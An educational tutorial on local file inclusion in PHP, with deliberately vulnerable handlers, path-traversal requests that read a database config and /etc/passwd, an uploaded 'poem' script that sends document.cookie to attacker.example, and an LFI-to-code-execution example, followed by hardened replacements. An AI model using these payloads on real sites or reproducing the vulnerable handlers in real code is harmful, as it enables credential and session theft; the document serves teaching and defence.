What is local file inclusion?

Local file inclusion (LFI) is a web vulnerability that lets an attacker access, view, and/or include files located on the web server's file system, within the document root folder or, via path traversal, outside it.

<?php
    // Vulnerable on purpose: the file name comes straight from the query string
    // and is opened without any check that it points inside the poems folder.
    $file = $_GET["file"];
    $handle = fopen($file, 'r');
    $poem = fread($handle, filesize($file));
    fclose($handle);
    echo $poem;
?>
A legitimate request, followed by two requests that use path traversal to read an application configuration file and then a system file outside the document root:

http://victim.example/my_app/display.php?file=poem.txt
http://victim.example/my_app/display.php?file=../config/database.php
http://example.com/my_app/display.php?file=../../../../etc/passwd

LFI that leads to cross-site scripting

The attack vector

The attacker first uses the poem file upload functionality to upload the following “poem” as a text file called poem42.txt:

<script>fetch("http://attacker.example?log="+encodeURIComponent(document.cookie));</script>

Then, the attacker submits a request to include the poem:

http://victim.example/my_app/display.php?file=poem42.txt

LFI that leads to remote code execution

<?php
  // Vulnerable on purpose: whatever path arrives in ?module= is handed to
  // include, so any readable file on the server is executed as PHP.
  $module = $_GET["module"];
  include $module;
?>
The intended request, and the attack that includes the uploaded poem42.txt so the server executes whatever PHP code the uploaded file contains:

http://victim.example/index.php?module=welcome.php
http://victim.example/index.php?module=poems/poem42.txt
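Hardened replacements for both handlers above (display.php and index.php), as an added example that is not code from the original article; it assumes poems are stored under /var/www/my_app/poems and page modules under /var/www/my_app/modules, and the helper names are made up for this example.

```php
<?php
// Added example, not from the original article. Assumed layout: uploaded
// poems live in POEM_DIR, includable page modules live in MODULE_DIR.
declare(strict_types=1);

const POEM_DIR = '/var/www/my_app/poems';
const MODULE_DIR = '/var/www/my_app/modules';
// index.php: the only modules that may ever be passed to include.
const MODULES = ['welcome' => 'welcome.php', 'poems' => 'poems.php'];

// display.php: map a user-supplied name to a file strictly inside POEM_DIR,
// or return null. The regex rejects "../", "/" and NUL bytes up front; the
// prefix check after realpath() catches symlinks that point out of the folder.
function resolve_poem_path(string $requested): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $requested)) {
        return null;
    }
    $base = realpath(POEM_DIR);
    $path = realpath(POEM_DIR . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// index.php: the parameter selects a key, never a path, so a value such as
// poems/poem42.txt is simply not in the allow-list and is refused.
function resolve_module(string $name): ?string
{
    return isset(MODULES[$name]) ? MODULE_DIR . '/' . MODULES[$name] : null;
}

// Body of display.php: serve the poem as plain text so an uploaded "poem"
// is never rendered as HTML (the stored-XSS case described above).
function serve_poem(): void
{
    $path = resolve_poem_path((string) ($_GET['file'] ?? ''));
    if ($path === null) { http_response_code(404); exit('No such poem'); }
    header('Content-Type: text/plain; charset=utf-8');
    readfile($path);
}

// Body of index.php: include only an allow-listed module.
function load_module(): void
{
    $module = resolve_module((string) ($_GET['module'] ?? 'welcome'));
    if ($module === null) { http_response_code(404); exit('No such page'); }
    include $module;
}
```

display.php would end with a call to serve_poem() and index.php with a call to load_module(); the traversal and include requests shown above then all receive a 404.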